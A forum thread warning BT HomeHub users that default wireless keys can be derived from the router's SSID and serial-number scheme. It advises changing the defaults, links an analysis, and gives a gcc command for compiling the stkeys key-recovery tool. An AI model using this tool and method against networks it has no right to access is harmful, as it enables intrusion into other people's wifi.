Attention BT HomeHub Users

[rizla]

The BT HomeHub in common with many ISP-supplied routers comes with the wireless security preconfigured. By that I mean there is a SSID and a WEP/WPA Key preconfigured in the router before it is shipped. There will usually be a sticker on the router with something like this on it :

Default SSID = BTHomeHub-8DF3
Default WEP/WPA Key = 06f48a28eb

Now neither the SSID or Key are chosen randomly or sequentially so the next router in the sequence wouldn't necessarily be BTHomeHub-8DF4 but it could be. Basically the ISPs use some sort of predictable algorithm to generate the Key and the SSID, both of which should hopefully be unique.

The only sensible way to generate the key is really from the router's serial number and that's what they generally do.

Now here's the bombshell.

The way that BT implemented this has a glaring vulnerability.

This means that you can take a default SSID like BTHomeHub-8DF3 and derive a list of possible keys from the SSID and a knowledge of the serial number structure (eg CP0647EH6DM(BF)). In the case of the BTHomeHub there would be 80 possible keys which would take very little time to try.

This is so important it is worth shouting :

IF YOU USE THE DEFAULT SSID/KEY IT MAKES NO DIFFERENCE WHETHER YOU USE WEP OR WPA! YOU ARE VULNERABLE

This isn't unique to BT - Orange in Spain use ST585v6 routers preconfigured to use WPA. A tool exists which will narrow the choice of keys down to two!

What should you do?

Simply change the SSID and WEP/WPA key to something else.

If you are using WEP then try using WPA instead as WEP is not secure.

More reading - http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/

[soms]

Very interesting reading. Thanks for the heads up Rizla.

I downloaded the stkeys archive but it seems to contain program source code in the C langauge. Without going off topic, do you know anything about how I could compline the program to use it? I have downloaded Netbeans IDE C/C++ but am having trouble understanding it and also adding in a compiler which oddly is not included.

[Floydoid]

Soms, is this page of any use?

http://www.thefreecountry.com/compilers/cpp.shtml

[soms]

Soms, is this page of any use?

http://www.thefreecountry.com/compilers/cpp.shtml

Cheers Floydoid, looks hopeful. Will see what I can find

[Floydoid]

It looks like a site dedicated to C programming... but don't ask me, I did a level 2 NVQ in C+ back in '95 and don't remember much at all.

(I believe we were using good old 286 machines at the time.)

[rizla]

In the stkeys.c file it actually tells you how to do this

You'll need GCC for whatever platform you have - http://gcc.gnu.org/

Then compile the source :

gcc -fomit-frame-pointer -O3 -funroll-all-loops stkeys.c sha1.c -ostkeys

Then run it according to the instructions in stkeys.c

[rizla]

TBB have now picked up on this - better late than never eh?

[kitz]

whoops I said the other day I was going to sticky a copy in the Hardware section - sorry forgot 

[rizla]

Did you? I forgot too in that case

[Azzaka]

The new v7's do not have this vulnerability, however I don't know if the BT Home Hub will be upgraded to incorporate the new version.

[kitz]

>> Did you? I forgot too in that case

Yep - Just before we also talked about BTs new boss's challenge to OFCOM (which I also forgot to post till today) 

[rizla]

The new v7's do not have this vulnerability, however I don't know if the BT Home Hub will be upgraded to incorporate the new version.

Just to make this clear to everyone that this isn't some sort of security problem inherent to a brand/version of router; this is a security problem with the way that the key and SSID have been generated. I rather suspect we'll find that the "Secure Easy Setup" button on Linksys kit operates in a similar way.

On reflection, using a key generated from something as easily predictable as a serial number is stunningly dumb. It is hard to believe that vulnerabilities such as these haven't already been widely exploited as its so trivially easy to do

[J.Man]

Hey Rizla im sorry it isnt too easy to change the password as if you do your HomeHub will revert back to the default pass and therefore dragging you back into the issue you pointed out but all I can honestly say is that if you do try to change the password dont make it obvious like say you support arsenal and your birthday is 12th of August for instance making your password something to do with those 2 could be pretty dimwitted. Another piece of advice is either downgrade to firmware 6.1.1.2 E i think it is or upgrade to 6.2.2.6 C

[rizla]

That sounds a bit odd. I changed the SSID and key on our neighbours connection and that went OK.

The key isn't really the major problem, its the fact that the broadcast SSID and serial numbers can be used to yield that key with little difficulty.

Changing the SSID will minimise the risk but it won't eliminate it as you could still generate all possible keys for the router just from knowledge of the serial number structure. While there will be a LOT of keys to test it does mean that no encryption algorithm is safe if the printed key is used.